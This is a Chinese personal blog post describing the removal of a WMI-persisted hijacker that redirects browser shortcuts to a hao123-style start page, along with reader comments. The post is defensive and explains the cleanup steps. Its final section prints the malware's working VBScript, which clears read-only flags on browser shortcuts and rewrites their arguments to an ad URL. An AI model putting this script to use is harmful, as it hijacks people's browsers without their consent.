WMI 病毒,篡改浏览器主页为 hao123 斩草除根

分享,记录 2017-02-16 5 条评论 访问: 13,649 次

0x00 中毒状况

作为总是爱折腾电脑的计算机系同学,有时候对重装系统,安装杀毒软件并没有什么兴趣,甚至就是懒得整这些了。我的电脑 Chrome 总是被篡改成 hao123 为主页。两三个月了,我懒得理他。我知道是快捷方式病毒,在快捷方式-属性-目标,后面附加一串网址,这样通过快捷方式打开浏览器的时候就跳转到 hao123 了。把参数删了就恢复正常。然而以后还会间歇性发作,久而久之就懒得理他了。

0x01 一种解决方法

我是 win 10 系统,要找到快速启动栏,开始菜单,任务栏的快捷方式存放的目录
找到C:\Users\你的用户名\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBarC:\Users\你的用户名\AppData\Roaming\Microsoft\Internet ExplorerC:\ProgramData\Microsoft\Windows\Start Menu\Programs
快捷方式属性,最后面的网址删除,然后删除所有,任何用户对该快捷方式的写入权限。从此再也没出过问题。

0x02 斩草除根

下载 WMI Tools 点那个钢笔图标,一路 OK ,然后找到那个事件删除就可以了。同时别忘了手动删除所有浏览器快捷方式属性-属性-目标后面的网址。

0x03 病毒源码

On Error Resume Next:Const link = "http://hao.qquu8.com/?m=yx&r=j3":Const link360 = "http://hao.qquu8.com/?m=yx&r=j3&s=3":browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,opera.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe":lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\lenovo\Desktop,C:\Users\lenovo\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\lenovo\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\lenovo\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\lenovo\AppData\Roaming\Microsoft\Windows\Start Menu\Programs":browsersArr = split(browsers,","):Set oDic = CreateObject("scripting.dictionary"):For Each browser In browsersArr:oDic.Add LCase(browser), browser:Next:lnkpathsArr = split(lnkpaths,","):Set oFolders = CreateObject("scripting.dictionary"):For Each lnkpath In lnkpathsArr:oFolders.Add lnkpath, lnkpath:Next:Set fso = CreateObject("Scripting.Filesystemobject"):Set WshShell = CreateObject("Wscript.Shell"):For Each oFolder In oFolders:If fso.FolderExists(oFolder) Then:For Each file In fso.GetFolder(oFolder).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:Set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:If LCase(name) = LCase("360se.exe") Then:oShellLink.Arguments = link360:Else:oShellLink.Arguments = link:End If:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:Next:

除非注明,嗯VIEW文章均为原创,转载请以链接形式标明本文地址
本文地址:https://www.umview.com/purge-hao123

本文由 Mark 创作,采用 知识共享署名 3.0,可自由转载、引用,但需署名作者且注明文章出处。

5 条评论

  1. 马超金博客
    马超金博客

    我的电脑也经常中奖

    回复
  2. 姜辰
    姜辰

    这是用了不干净的PE做的~或者GHO。我个人用的WEPE和微软官方ISO镜像做系统。

    回复
    1. Mark
      Mark

      我的是用了被人加了流氓代码的 Win10 激活器搞得....

      回复
      1. 姜辰
        姜辰

        还不如5元一个激活码= =

        回复
  3. 商学院
    商学院

    我得被篡改成搜狗浏览器,烦人

    回复
取消回复

添加新评论